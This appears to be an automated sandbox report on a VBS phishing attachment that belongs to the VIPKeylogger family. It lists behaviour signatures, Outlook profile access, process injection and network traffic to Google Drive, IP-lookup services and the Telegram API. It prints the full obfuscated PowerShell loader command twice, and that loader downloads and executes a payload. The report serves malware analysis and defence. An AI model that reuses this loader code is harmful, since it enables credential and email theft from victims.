Analysis Overview
SHA256
14eb913e7c5fe08f6c5f656178f35713b605f7d0aa1c62489b3cfaf418a0c27e
Threat Level: Known bad
The file Request For Quotation-RFQ097524_Pdf.vbs was found to be: Known bad.
Malicious Activity Summary
Vipkeylogger family
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
System Location Discovery: System Language Discovery
Browser Information Discovery
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
outlook_win_path
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-30 06:23
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-30 06:23
Reported
2024-10-30 06:25
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
158s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2508 wrote to memory of 2412 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2508 wrote to memory of 2412 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1840 wrote to memory of 1168 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1840 wrote to memory of 1168 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1840 wrote to memory of 1168 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1840 wrote to memory of 1168 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request For Quotation-RFQ097524_Pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Skravereapparat Brnecykels Chilotomy Allegorien #>;$rlingsankerets='Blissful';<#Revanchekamps Ledestjerne Dandyishly Momotidae Anraaber Rommens #>; function Indbankende($Udspejdes){If ($host.DebuggerEnabled) {$Nationalrettens++;}$Refusionsopgrelsen=$Notwithstanding+$Udspejdes.'Length'-$Nationalrettens; for ( $Skillessness=5;$Skillessness -lt $Refusionsopgrelsen;$Skillessness+=6){$vejle=$Skillessness;$spejlet+=$Udspejdes[$Skillessness];}$spejlet;}function Pyrogens($Woblernes){ . ($Brinkmanns) ($Woblernes);}$Konformistiske=Indbankende 'LicenM DevioCeleszPersoiAffejlAa sklB dgraCusto/ko,st ';$Unsimulated156=Indbankende 'PrdisTcr,nalOrgans vile1 Shin2Forha ';$Mirjas='prove[AtramNStjerET,eogTK pit. dstas ,emaePar orFavorvPaniciSibilCKo,ceeSsl.np ExtooSpgelISpiriNReforTSlaaemLedsaaUttheNJow eAKeerigTusseEMaaleRAp ca] cari:Ch li:SeacoSSubpaERhinoCSnkniUCitywRInforiRepo tWolfrYEpexep L,derSkrivoUn alTAnseeO,jeneCFlygtOSoloslHyper=Drama$ tomiuRegisn CacoSProtii ugtiMRecliUEmblel MoldaMaaletFravreRom.ndHange1Faggo5Sanch6Jej,n ';$Konformistiske+=Indbankende 'Solst5Inter.St ki0Triss arbl(S micWInd eiBrndenNonsudAfs ioSidemwImpsosInsna cho dNSta iTCogit retsl1Disbo0 Kon .medde0 Sama;Safir BasylWstiksiUdv sn Pl u6Nedsl4 ,rig;Outsi .roldxThirs6Utthe4Diopt; Insi canalrChu,mvEffer:Crino1 Suba3Mangl1Affyr. Laps0Viv.c)Jenbr PartsGUni reHagbacUnt ekDis eoSaltp/Idiot2Gobyp0Puppe1Kandi0Haang0Under1U rmn0Hverd1Melli Af nF rusvi nterbattleKb anfsaarso Und xOkseb/Svine1Afkld3Rep o1anthe.Kidne0 B ug ';$Platoniker=Indbankende ',apesuFor,osUniveESordiR Fa,t-partiaMasseGApterEFrivoNBourntCopro ';$Udbldningers=Indbankende ' Dm nhUrnegtTypogts rmopArrens Call:Dyrlg/ nage/Preced.ilkar .rtiiUndervOutcaeFarve.NeodagefteroPlumoo SkrdgIndkol New eNrlse.StentcBevidoWoodym uses/opdrauImmatcFable?Pyro.eMisvix An epTissuosuperrDysletMgald=VentrdPuirso Kirkw Impen SeselDeprioDipnear fledKamm & Ma aiAnteddacc u=Softw1Mater2HumboVP,rineKryds-prod.AFarengUlkenfSkalpT VulcuMa giCukr iK Unm n.eceniA lesh rude7Statsa phonWR.spolSamme3Tilt,9ge tez SommpJubelQValseuUdskaj SkamkLabyrCGardiw RecogBremsdBijobHTeosoT,rste ';$Rattus=Indbankende 'c,rks>.ajor ';$Brinkmanns=Indbankende ' aldiDoumaemalacX Cr o ';$Fient='Outrivalled';$Skandinavist='\Bortelimeneres.Uds';Pyrogens (Indbankende 'Rudim$DozerGRainwL MangO OverbP lgrA S lel Regn:RadiuAtrikom nterBFiraaITk,edTDaktyiTilbasClothE ChamRmorale latasUndet=Explo$R ughEBel jnBallovInact:Bil,oAing nPGrat P SqueDSuperATorskt,latiaStrab+Ftncm$ .oussBl,bmKNeapoASvensNTakr DTo.sii inimn Sa nAS illVUdkigi essls Dre.tFra.r ');Pyrogens (Indbankende 'Zooph$ SterGTo,meL GuimO Schib eurya I trLletha:dialesMal,rUL fttpNondee Un,artaktfLCent,ADul.iBHal lOFdse RIsen,iElectoPhysouKalliSPsyc.nUnderEMult sInte,sMesch=Givti$TithouSyndidNedblB TabiLInvalDFrednnMarkeIU ocaN.nputG Per,ERos,bRVes,csUdenr.remisSFunduPFo,reL umbi amueTKr dr( onog$FormoR DelmAF rhaT Lnovt,agaeuRouses mort)Pinne ');Pyrogens (Indbankende $Mirjas);$Udbldningers=$superlaboriousness[0];$Verifikationens=(Indbankende 'Subca$G utcgLikvilre,reOHerm BPlodda s dalBrob : ReveIInstamRaketmVoldgAUnrufricterCFengeEAfmilS.lissc.lectIRdhaab BevglResigEu pan5Ap lo=JoannNQui.zeUdtalW Assi-HalvnOLeksibPandejSa,dsE ampCL.erbT Semi antshSPhysiyChikiSCykelt,aataEBlithMFrids.PosttnKr gsE nkartJehul.TegniwlifeseRegulbCrumbC ontrLAfhugiIndrme Tredn F astekspe ');Pyrogens ($Verifikationens);Pyrogens (Indbankende 'Koord$UnderIKujonmKildemAp alaVarebrSlskicSrv,reSatirsForsoc RegiihjemlbabelilSuluderelak5Rkeen.GabbiH yrogeMa ara hjr dGenereBa,serVirgosSubco[Pulas$ g.leP SkiblIllusa VisutKio,koStukknReshoiIsagokAnmrkeF,rgarCirke]Lsgr =Perso$ Bi.tKHuedeo Pan n Accif UlydobasigrOv rbmSytteiSkyldsA otetBegrliHe edsVnnedkNonh.eSorns ');$Strops203=Indbankende 'Hje,l$ StraIThundmHospimUdarma DegnrBescucKiwifeBosats ProrcMisi iGennebUstillForepe Anse5Milke.ChummDProg.oMetapw PolenMorn lSubs.oCraziaR tradbirkeFSub riLeadllC nnieTuris(S let$ ssegURavkndO erpbMajorlHedondMam nnAsieniOve nnV nregTopi e Brolr JulesDups , Inte$ saetP Forlo AngisEx,rot Odyst DommhN taly iplorTillgo B,vaiMelled IndraNo dvl Nd r)Misun ';$Postthyroidal=$Ambitiseres;Pyrogens (Indbankende 'Salie$ Sejugbarrel Ded.oGastrbGroanaParallSu or: SuboN UranoHresin CycyrL arne WeekQMi jsu vvei UnliS L rsIContetnitraeMi er=Seleu(SolostFjerneBlokastoksiT tire- Un hpHysteASkabsTInputh .hau eve$Dorsop Tilso epi SDis,eT nosttC argHStyrey InteRForbroRetsfiArabiDFabelaUn,raLsubtr)Hebra ');while (!$Nonrequisite) {Pyrogens (Indbankende 'Clina$ Kiasg tte lNavigoIn,flbUnlenamoililSpoli:CentiO angivDrifteSa iarBet.ehBirodoTanetl LnkoiIrishnKonfueE carstas es Aebl=Hybel$ UntrtLavherGreveu Dawne.orts ') ;Pyrogens $Strops203;Pyrogens (Indbankende 'Arti,SForflTDisaraproc,r artTFilov-SrskrSIl egl T amEStaldep iorPCl.rk Kajsp4Imeri ');Pyrogens (Indbankende ' Spri$OutwogWildiL Gok O undeBForskaWith.LDomme:Rr ddnF jlpoSuperndo ber PolyeC.mmeqSkambUViseliH.lvoSGermaIrift TStadfeCingu=Slger(Hyt eTTelegEPeppes Ton Tforly-IndbjPBlidea .fsktGinenh Unex Aris$FirempSugamOC,nomsProgrTBir.et Unu hSol,iY TerrRBas loRutsjI Apo,DFissuaA aziL,lama)Ne li ') ;Pyrogens (Indbankende 'Couri$AarenG Ons Lfolkeo.essubAf.edaDelegLci,il:LiterlTr.ppE JagtT fkbeT valie beklsGrucctOblivEUk,ukS Slag=Unint$Psyc,GRaadgL.ktexOKishkb B ggaWaferL Bush:Kde,eiBankbDSkamfEBarneNOutcatAdelsIDuvniTMarkeeAf krT S syS KaffPR gklrEggheONonbeb UndelPeploeacce,mNebraEUnd rTPrestspret +Bispo+Po zo%Filmm$ArtikSFacituStn ePRisenEBerthr SeleLLap laGittiBSu,ero SyssrOoi.si .ateo MellU N nvS.rednNPrefaE Impasari,rS Rund.AffircunlinOBu kiuRentenVugn TRamli ') ;$Udbldningers=$superlaboriousness[$Lettestes];}$Omdigtning=318395;$Uforsrgedes=31683;Pyrogens (Indbankende 'Baby $ Afk GIndkol R enOPrecoBSelvfA,hichlB,ond:VifilB.aninaClipsrFrsteYAposeS SnegP.verhhMaculeFidfaRRednie Ree mosg.=Dwa f EtatsGtelegEPockiTpough- DelmCTo.dioDefaiNvaabeTBl thES rygnSubarTLseng Tra,$DegenpVkkerOSkilbsTrillTPiecetVexatH kroby mertrFan,eO utatiHermeDC.sigaUdplulB.mhu ');Pyrogens (Indbankende ' Simp$Bahr gAttrilTrestoretrab c pyaSkattlS,inn:SprogD Bldhr UmbeaSube.nBorsyksrhfte EnerrTagryeRegio1Gul.y5Ford.3Slank Pa.as=Rejse Gril[TawdrSStandyUntersCompet Bre.eGl rem Biog.TabulCbilggoInforn udskvDreameDatabrAagettSider]P uci:Story:AutopFBouchrsalgboLudwim CincB Pr.caSlvbesFodere Flag6Overs4SneglSWooletKompirAfflaiNasarnRund.gVitup( Ldin$SlantBZarzuaFniker PaakyDrawbsEmblepr sunhOver eSeraerAmphieSpeku) arro ');Pyrogens (Indbankende ' fkli$.ammeGL getlWayako amibAfstdAKon rlPalai:.esepRly edOBereguP askg elfrhRosenI Fo tSU.smohSurde Smila= Paro nat.r[DrnedSKadenYTodd.Sexem TGoodleRecitM Met .alvorTRul eE arkeXAngartIndor. oldeELdrepnGraphCRepolO UdbeDKnoglISubclNDvrgfGfable]under: inni:Spid A ReseSDesilCG apaiIrratiNo de.,nkleg DentERentetS cias orstTtysaRMetasi Lgnen Platgdisem(Blods$Debi.DBlomsr NoncAUnbomNarbejKPasteesove RafmysEwullc1Physi5B.rne3Hornb)aceit ');Pyrogens (Indbankende 'Plati$detaigR zorlTil.oO,ugbrbNatalaMerliL.ensy:VaultFFarceLNunshE BreaTEj ndf Blo.E PrisL olshtNarageRhe mr Prob=.nter$ Fa irKvadroOuz,suLicenGS lliHDi saIFe dsSbeva hBel.j.ServiSMistnuMelleBAndens zaret V,olRSkallI Th nNHekseG Pi u(Inter$MadweOForstM StaddMedioIDinosGProceTImpernKjersIChuntnA lerg Hyal,Flde.$UmtteU B,kefOvertOVernar CensSSemitrWeepiGVerrieRm.blD S,ameFebe,SAbsol)Delfl ');Pyrogens $Fletfelter;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skravereapparat Brnecykels Chilotomy Allegorien #>;$rlingsankerets='Blissful';<#Revanchekamps Ledestjerne Dandyishly Momotidae Anraaber Rommens #>; function Indbankende($Udspejdes){If ($host.DebuggerEnabled) {$Nationalrettens++;}$Refusionsopgrelsen=$Notwithstanding+$Udspejdes.'Length'-$Nationalrettens; for ( $Skillessness=5;$Skillessness -lt $Refusionsopgrelsen;$Skillessness+=6){$vejle=$Skillessness;$spejlet+=$Udspejdes[$Skillessness];}$spejlet;}function Pyrogens($Woblernes){ . ($Brinkmanns) ($Woblernes);}$Konformistiske=Indbankende 'LicenM DevioCeleszPersoiAffejlAa sklB dgraCusto/ko,st ';$Unsimulated156=Indbankende 'PrdisTcr,nalOrgans vile1 Shin2Forha ';$Mirjas='prove[AtramNStjerET,eogTK pit. dstas ,emaePar orFavorvPaniciSibilCKo,ceeSsl.np ExtooSpgelISpiriNReforTSlaaemLedsaaUttheNJow eAKeerigTusseEMaaleRAp ca] cari:Ch li:SeacoSSubpaERhinoCSnkniUCitywRInforiRepo tWolfrYEpexep L,derSkrivoUn alTAnseeO,jeneCFlygtOSoloslHyper=Drama$ tomiuRegisn CacoSProtii ugtiMRecliUEmblel MoldaMaaletFravreRom.ndHange1Faggo5Sanch6Jej,n ';$Konformistiske+=Indbankende 'Solst5Inter.St ki0Triss arbl(S micWInd eiBrndenNonsudAfs ioSidemwImpsosInsna cho dNSta iTCogit retsl1Disbo0 Kon .medde0 Sama;Safir BasylWstiksiUdv sn Pl u6Nedsl4 ,rig;Outsi .roldxThirs6Utthe4Diopt; Insi canalrChu,mvEffer:Crino1 Suba3Mangl1Affyr. Laps0Viv.c)Jenbr PartsGUni reHagbacUnt ekDis eoSaltp/Idiot2Gobyp0Puppe1Kandi0Haang0Under1U rmn0Hverd1Melli Af nF rusvi nterbattleKb anfsaarso Und xOkseb/Svine1Afkld3Rep o1anthe.Kidne0 B ug ';$Platoniker=Indbankende ',apesuFor,osUniveESordiR Fa,t-partiaMasseGApterEFrivoNBourntCopro ';$Udbldningers=Indbankende ' Dm nhUrnegtTypogts rmopArrens Call:Dyrlg/ nage/Preced.ilkar .rtiiUndervOutcaeFarve.NeodagefteroPlumoo SkrdgIndkol New eNrlse.StentcBevidoWoodym uses/opdrauImmatcFable?Pyro.eMisvix An epTissuosuperrDysletMgald=VentrdPuirso Kirkw Impen SeselDeprioDipnear fledKamm & Ma aiAnteddacc u=Softw1Mater2HumboVP,rineKryds-prod.AFarengUlkenfSkalpT VulcuMa giCukr iK Unm n.eceniA lesh rude7Statsa phonWR.spolSamme3Tilt,9ge tez SommpJubelQValseuUdskaj SkamkLabyrCGardiw RecogBremsdBijobHTeosoT,rste ';$Rattus=Indbankende 'c,rks>.ajor ';$Brinkmanns=Indbankende ' aldiDoumaemalacX Cr o ';$Fient='Outrivalled';$Skandinavist='\Bortelimeneres.Uds';Pyrogens (Indbankende 'Rudim$DozerGRainwL MangO OverbP lgrA S lel Regn:RadiuAtrikom nterBFiraaITk,edTDaktyiTilbasClothE ChamRmorale latasUndet=Explo$R ughEBel jnBallovInact:Bil,oAing nPGrat P SqueDSuperATorskt,latiaStrab+Ftncm$ .oussBl,bmKNeapoASvensNTakr DTo.sii inimn Sa nAS illVUdkigi essls Dre.tFra.r ');Pyrogens (Indbankende 'Zooph$ SterGTo,meL GuimO Schib eurya I trLletha:dialesMal,rUL fttpNondee Un,artaktfLCent,ADul.iBHal lOFdse RIsen,iElectoPhysouKalliSPsyc.nUnderEMult sInte,sMesch=Givti$TithouSyndidNedblB TabiLInvalDFrednnMarkeIU ocaN.nputG Per,ERos,bRVes,csUdenr.remisSFunduPFo,reL umbi amueTKr dr( onog$FormoR DelmAF rhaT Lnovt,agaeuRouses mort)Pinne ');Pyrogens (Indbankende $Mirjas);$Udbldningers=$superlaboriousness[0];$Verifikationens=(Indbankende 'Subca$G utcgLikvilre,reOHerm BPlodda s dalBrob : ReveIInstamRaketmVoldgAUnrufricterCFengeEAfmilS.lissc.lectIRdhaab BevglResigEu pan5Ap lo=JoannNQui.zeUdtalW Assi-HalvnOLeksibPandejSa,dsE ampCL.erbT Semi antshSPhysiyChikiSCykelt,aataEBlithMFrids.PosttnKr gsE nkartJehul.TegniwlifeseRegulbCrumbC ontrLAfhugiIndrme Tredn F astekspe ');Pyrogens ($Verifikationens);Pyrogens (Indbankende 'Koord$UnderIKujonmKildemAp alaVarebrSlskicSrv,reSatirsForsoc RegiihjemlbabelilSuluderelak5Rkeen.GabbiH yrogeMa ara hjr dGenereBa,serVirgosSubco[Pulas$ g.leP SkiblIllusa VisutKio,koStukknReshoiIsagokAnmrkeF,rgarCirke]Lsgr =Perso$ Bi.tKHuedeo Pan n Accif UlydobasigrOv rbmSytteiSkyldsA otetBegrliHe edsVnnedkNonh.eSorns ');$Strops203=Indbankende 'Hje,l$ StraIThundmHospimUdarma DegnrBescucKiwifeBosats ProrcMisi iGennebUstillForepe Anse5Milke.ChummDProg.oMetapw PolenMorn lSubs.oCraziaR tradbirkeFSub riLeadllC nnieTuris(S let$ ssegURavkndO erpbMajorlHedondMam nnAsieniOve nnV nregTopi e Brolr JulesDups , Inte$ saetP Forlo AngisEx,rot Odyst DommhN taly iplorTillgo B,vaiMelled IndraNo dvl Nd r)Misun ';$Postthyroidal=$Ambitiseres;Pyrogens (Indbankende 'Salie$ Sejugbarrel Ded.oGastrbGroanaParallSu or: SuboN UranoHresin CycyrL arne WeekQMi jsu vvei UnliS L rsIContetnitraeMi er=Seleu(SolostFjerneBlokastoksiT tire- Un hpHysteASkabsTInputh .hau eve$Dorsop Tilso epi SDis,eT nosttC argHStyrey InteRForbroRetsfiArabiDFabelaUn,raLsubtr)Hebra ');while (!$Nonrequisite) {Pyrogens (Indbankende 'Clina$ Kiasg tte lNavigoIn,flbUnlenamoililSpoli:CentiO angivDrifteSa iarBet.ehBirodoTanetl LnkoiIrishnKonfueE carstas es Aebl=Hybel$ UntrtLavherGreveu Dawne.orts ') ;Pyrogens $Strops203;Pyrogens (Indbankende 'Arti,SForflTDisaraproc,r artTFilov-SrskrSIl egl T amEStaldep iorPCl.rk Kajsp4Imeri ');Pyrogens (Indbankende ' Spri$OutwogWildiL Gok O undeBForskaWith.LDomme:Rr ddnF jlpoSuperndo ber PolyeC.mmeqSkambUViseliH.lvoSGermaIrift TStadfeCingu=Slger(Hyt eTTelegEPeppes Ton Tforly-IndbjPBlidea .fsktGinenh Unex Aris$FirempSugamOC,nomsProgrTBir.et Unu hSol,iY TerrRBas loRutsjI Apo,DFissuaA aziL,lama)Ne li ') ;Pyrogens (Indbankende 'Couri$AarenG Ons Lfolkeo.essubAf.edaDelegLci,il:LiterlTr.ppE JagtT fkbeT valie beklsGrucctOblivEUk,ukS Slag=Unint$Psyc,GRaadgL.ktexOKishkb B ggaWaferL Bush:Kde,eiBankbDSkamfEBarneNOutcatAdelsIDuvniTMarkeeAf krT S syS KaffPR gklrEggheONonbeb UndelPeploeacce,mNebraEUnd rTPrestspret +Bispo+Po zo%Filmm$ArtikSFacituStn ePRisenEBerthr SeleLLap laGittiBSu,ero SyssrOoi.si .ateo MellU N nvS.rednNPrefaE Impasari,rS Rund.AffircunlinOBu kiuRentenVugn TRamli ') ;$Udbldningers=$superlaboriousness[$Lettestes];}$Omdigtning=318395;$Uforsrgedes=31683;Pyrogens (Indbankende 'Baby $ Afk GIndkol R enOPrecoBSelvfA,hichlB,ond:VifilB.aninaClipsrFrsteYAposeS SnegP.verhhMaculeFidfaRRednie Ree mosg.=Dwa f EtatsGtelegEPockiTpough- DelmCTo.dioDefaiNvaabeTBl thES rygnSubarTLseng Tra,$DegenpVkkerOSkilbsTrillTPiecetVexatH kroby mertrFan,eO utatiHermeDC.sigaUdplulB.mhu ');Pyrogens (Indbankende ' Simp$Bahr gAttrilTrestoretrab c pyaSkattlS,inn:SprogD Bldhr UmbeaSube.nBorsyksrhfte EnerrTagryeRegio1Gul.y5Ford.3Slank Pa.as=Rejse Gril[TawdrSStandyUntersCompet Bre.eGl rem Biog.TabulCbilggoInforn udskvDreameDatabrAagettSider]P uci:Story:AutopFBouchrsalgboLudwim CincB Pr.caSlvbesFodere Flag6Overs4SneglSWooletKompirAfflaiNasarnRund.gVitup( Ldin$SlantBZarzuaFniker PaakyDrawbsEmblepr sunhOver eSeraerAmphieSpeku) arro ');Pyrogens (Indbankende ' fkli$.ammeGL getlWayako amibAfstdAKon rlPalai:.esepRly edOBereguP askg elfrhRosenI Fo tSU.smohSurde Smila= Paro nat.r[DrnedSKadenYTodd.Sexem TGoodleRecitM Met .alvorTRul eE arkeXAngartIndor. oldeELdrepnGraphCRepolO UdbeDKnoglISubclNDvrgfGfable]under: inni:Spid A ReseSDesilCG apaiIrratiNo de.,nkleg DentERentetS cias orstTtysaRMetasi Lgnen Platgdisem(Blods$Debi.DBlomsr NoncAUnbomNarbejKPasteesove RafmysEwullc1Physi5B.rne3Hornb)aceit ');Pyrogens (Indbankende 'Plati$detaigR zorlTil.oO,ugbrbNatalaMerliL.ensy:VaultFFarceLNunshE BreaTEj ndf Blo.E PrisL olshtNarageRhe mr Prob=.nter$ Fa irKvadroOuz,suLicenGS lliHDi saIFe dsSbeva hBel.j.ServiSMistnuMelleBAndens zaret V,olRSkallI Th nNHekseG Pi u(Inter$MadweOForstM StaddMedioIDinosGProceTImpernKjersIChuntnA lerg Hyal,Flde.$UmtteU B,kefOvertOVernar CensSSemitrWeepiGVerrieRm.blD S,ameFebe,SAbsol)Delfl ');Pyrogens $Fletfelter;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.179.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| GB | 142.250.187.193:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.180.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| GB | 142.250.187.193:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 73.247.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 25.173.189.20.in-addr.arpa | udp |
Files
memory/2412-0-0x00007FFC0C5E3000-0x00007FFC0C5E5000-memory.dmp
